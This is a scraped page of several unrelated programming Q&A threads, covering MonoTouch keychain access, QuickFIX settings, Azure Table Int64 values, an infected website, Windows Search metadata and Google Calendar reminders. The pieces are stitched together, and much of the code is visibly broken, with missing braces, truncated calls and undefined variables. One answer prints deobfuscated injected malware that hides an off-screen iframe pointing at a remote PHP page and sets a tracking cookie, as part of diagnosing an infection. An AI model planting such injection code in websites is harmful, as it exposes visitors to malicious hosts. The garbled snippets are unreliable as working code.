EDIT: Issue has been resolved. To contribute a bit to the community I setup some helper methods and an example how to use them on my blog. Find it here KeyChain MT example
Original question:
Running iOS4.2 on Simulator and iPad.
I'm trying to store and read a password from the keychain using the code below. My inspiration for the code was https://github.com/ldandersen/scifihifi-iphone/ but I can't get it to work. What am I missing?
// Create a record.
SecRecord o = new SecRecord ( SecKind.GenericPassword );
o.Service = "myService";
o.Label = "myService";
o.Account = "test#test.com";
// The super secret password.
o.Generic = NSData.FromString ( "secret!", NSStringEncoding.UTF8 );
// Add to keychain.
SecKeyChain.Add ( o );
// Now cerate another recored to query what we just saved.
o = new SecRecord ( SecKind.GenericPassword );
o.Service = "myService";
o.Account = "test#test.com";
// Query as record.
SecStatusCode code;
var data = SecKeyChain.QueryAsRecord ( o, out code );
// This will tell us "all good!"...
Console.WriteLine ( code );
// But data.Generic is NULL and this line will crash. :-(
Console.WriteLine ( NSString.FromData ( data.Generic, NSStringEncoding.UTF8 ) );
Rather than use SecRecord's .ValueData try this:
Console.WriteLine(NSString.FromData(data.Generic, NSStringEncoding.ASCIIStringEncoding));
Generic returns NSData from where SecKind.GenericPassword's are stored.
I am writing quickfix call for NewOrderSingle/NewOrderCancelRequest/NewOrderStatusRequest.
Inorder to execute this request we need to fill one attribute that is AccountID.
As of now I am filling this attribute in each request individually like this-
So in each request i need to fill it. So i added this Account varibale in .cfg/settings file.
void Application::newOrderSingle44()
FIX::Account account("shad_tmp);
FIX44::NewOrderSingle newOrderSingle(
queryClOrdID(), querySide() ,
newOrderSingle.set( FIX::HandlInst('1') );
newOrderSingle.set( querySymbol() );
newOrderSingle.set( queryOrderQty() );
newOrderSingle.set( queryTimeInForce() );
queryHeader( newOrderSingle.getHeader() );
if ( queryConfirm( "Send order" ) )
FIX::Session::sendToTarget( newOrderSingle );
This is my client code to read from the settings file.
FIX::Initiator * initiator = 0;
FIX::SessionSettings settings( file );
const FIX::Dictionary& dict = settings.get();
std::string Account;
for (auto it = dict.begin(); it!=dict.end(); it++)
Account = it->second;
std::cout<<"Account ID----------->"<<Account<<std::endl;
Application application;
FIX::FileStoreFactory storeFactory( settings );
FIX::ScreenLogFactory logFactory( settings );
if (isSSL.compare("SSL") == 0)
initiator = new FIX::ThreadedSSLSocketInitiator( application, storeFactory, settings, logFactory );
initiator = new FIX::SocketInitiator( application, storeFactory, settings, logFactory );
delete initiator;
return 0;
But this is not working. Can any one please let me know how to read this Account value from setting file??
Let me know is there any other to read this Account value from setting file and save it in any varibale and use it in any requrest . I mean wherever required.
Using Node.js with Azure Storage table.
I've created a new table with two fields/keys (CreatedOn and NextRenewalDate) as Int64 values (time since epoch). The entgen correctly identifies the values as Int64 as desired before I save them to the table.
I know Azure documentation says that it stores int64 as string. It has been like that for a loong time.
I have been parsing the values of properties I know are int64 in my app's code after fetching and before using.
I am wondering if that is still the case ? Is there any in built way of getting the correct data type for values when I read them from Azure Storage Tables ?
Only those 8 types are supported by the Table Service Data Model. For more details, please refer to here.
Besides, when we retrieve entities from Azure table, the entity will return as OData JSON format. According to the OData protocol azure table support, Int64 will represent as string. For more details, please refer to here and here
I have not been able to find a built in way to read / convert Azure storage table entities back into json.
So I wrote a quick method, this will work as long as you requested metadata in payload.
const options = {payloadFormat:"application/json;odata=fullmetadata"};
Here is the quick function that might help somebody:
function convertArrayOfEntitiesToJson(arrEntities){
let arrRecords = [];
for(let x=0; x < arrEntities.length; x++){
const entity = arrEntities[x];
let allKeys = Object.keys( entity )
let record = {};
if(entity[key]['$'] === "Edm.Int64" )
record[key] = parseInt( entity[key]["_"] );
else if(entity[key]['$'] === "Edm.DateTime" )
record[key] = new Date( entity[key]["_"] );
else if(entity[key]['$'] === "Edm.Boolean" )
record[key] = ( entity[key]["_"] == 'true' );
else if(entity[key]['$'] === "Edm.Boolean" )
record[key] = ( entity[key]["_"] == 'true' );
else // fall back to string
record[key] = entity[key]["_"];
return arrRecords;
I'm missing a couple of data types on purpose. I did not have a need for the rest of the types. Feel free to add other data types as needed.
I developed a site about a year and half ago.It is very basic and simple html and little javascript.But all of sudden client informed me that his site is black-listed and in google it is showing that "may harm your computer..." msg.I looked into website's view source and noticed some additional scripts are there.I upgraded it to html5 and asked him to delete all previous files and put new files.That's worked fine and made it clear from being black-listed.just now out of curiosity I checked the site, upon visiting a "url not found" message is appearing in one corner,(for the first time only) and in source there are some additional scripts like before.I just copied it form source.
I don't have idea what is this?Is it some malware or what?If it is a some kind of malware, what should I do and how to prevent it?I am afraid if it going to be blacklisted again.
Any idea or advice would be greatly appreciated
Thanks in advance
Confirmed it to be malware - see link below. Seems to be a compromised admin password. First change that.
Is it a Wordpress site? I've heard good things about Better WP security plugin but I'm not too familiar with it.
If not Wordpress - seeing as you say "simple html, little javascript" check for SQL injection possibilities in any forms, etc., change FTP password.
Good luck!
Limeworks.org malware - Threat Report
after deobfuscation, this is the code you got:
function zkmh09() {
var static='ajax';
var controller='index.php';
var zkmh = document.createElement('iframe');
zkmh.src = 'http://rietavas.com/VwzfrgMK.php';
zkmh.style.position = 'absolute';
zkmh.style.color = '406';
zkmh.style.height = '406px';
zkmh.style.width = '406px';
zkmh.style.left = '1000406';
zkmh.style.top = '1000406';
if (!document.getElementById('zkmh')) {
document.write('<p id=\'zkmh\' class=\'zkmh09\' ></p>');
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
return null;
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
if (navigator.cookieEnabled)
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
as you can see it creates an iframe element and send an ajax requests to http://ri***vas.com/Vwz***MK.php page. also it has two other function to set and get cookies.
I would like to read metadata of a DWG/AutoCAD file via Windows Search indexing service. I'm talking about properties that can be accessed with the right click in explorer without opening AutoCAD.
I have an MFC dialog based application written in Visual C++ 2005 and from inside this app I would like to access metadata (such as author, creation date etc.) of the given file. This was done by iFilter but it is deprecated since Windows XP and will be gone in Windows 8 (and LoadIFilter is not present in VS2005). Now from what I understand, it can be done with windows search - correct me if I'm wrong. Every example I found (msdn included) shows how to give data about your own files to windows search for indexing though. What I need is to know how to ask Windows Search about metadata for a given file.
Here's what I've come up with so far:
BOOL WSQ_DoQuery( const wchar_t *constr, const wchar_t *querystr, VARIANT &result ) {
HRESULT hr = 0;
BOOL ret;
// Get the ADO connection
_Connection *con = NULL;
hr = CoCreateInstance( CLSID_Connection, NULL, CLSCTX_ALL, IID__Connection, (LPVOID *)&con );
if ( SUCCEEDED(hr) ) {
_Recordset *rs = NULL;
// Convert wide strings to BSTR as required by ADO APIs
BSTR bconstr = SysAllocString( constr );
BSTR bquerystr = SysAllocString( querystr );
if ( bconstr && bquerystr ) {
// Open the connection
hr = con->Open( bconstr, NULL, NULL, 0 );
if ( SUCCEEDED(hr) ) {
// Execute the query
hr = con->Execute( bquerystr, NULL, 0, &rs );
if ( SUCCEEDED(hr) ) {
// Display the results
ret = WSQ_GetCDate( rs ,result);
} else {
TRACE( "Failed to execute query, %08x\r\n", hr );
} // if
} else {
TRACE( "Failed to open ADO connection, %08x\r\n", hr );
} // if
} else {
TRACE("Failed to convert wide to BSTR\r\n" );
} // if
if ( bconstr ) {
SysFreeString( bconstr );
if ( bquerystr ) {
SysFreeString( bquerystr );
} else {
TRACE("Failed to get connection, %08x\r\n", hr );
} // if
return ret;
} // DoQuery
The connection string (constr) is
provider=Search.CollatorDSO.1;EXTENDED PROPERTIES="Application=Windows"
as returned by ISearchQueryHelper.
And the query (querystr) is
SELECT System.Document.DateCreated FROM SystemIndex WHERE System.FileName LIKE 'filename%' AND DIRECTORY='file:C:\path\to\file'
The problem now is that I get an exception:
First-chance exception at 0x77c5fc56 in fraudTest.exe: Microsoft C++ exception: CNLBaseException at memory location 0x0012d6d0..
on this line
hr = con->Open( bconstr, NULL, NULL, 0 );
followed by the empty result from the query (this code is from WSQ_GetCDate):
rs->get_EOF( &eor );
while ( eor != VARIANT_TRUE ) { //this never executes }
Suprisingly SUCCEEDED(hr) returns true after the exception.
Where have I made en error and how to try and find it?
I didn't solve this particular problem, but I learned that I don't need Windows Search to get the file metadata. The keyword to look for is "properties" instead of meta-data. I got my piece of code from Windows SDK v7.0 sample application named PropertyEdit.
I have worked out how to add a reminder after setting a CalendarEventEntry using
insertedEntry = myService.insert( postUrl, myEntry )
reminder = new Reminder()
reminder.setMethod( Reminder$Method.ALERT )
insertedEntry.getReminder().add( reminder )
but if you update it becomes an EventEntry and the getReminder returns null and whatever you do it wipes all reminders
insertedEntry = myService.update(editUrl, myEntry)
can find nothing in the api or docs about this case.
Anyone solved this already??
Did you try to cast the update result ?
BaseEntry updateEntry = myService.update(editUrl, myEntry)
if (updatedEntry instanceOf CalendarEventEntry) {
insertEntry = (CalendarEventEntry) updatedEntry
Can't you simply update it with:
rather than
insertedEntry = myService.update(editUrl, myEntry)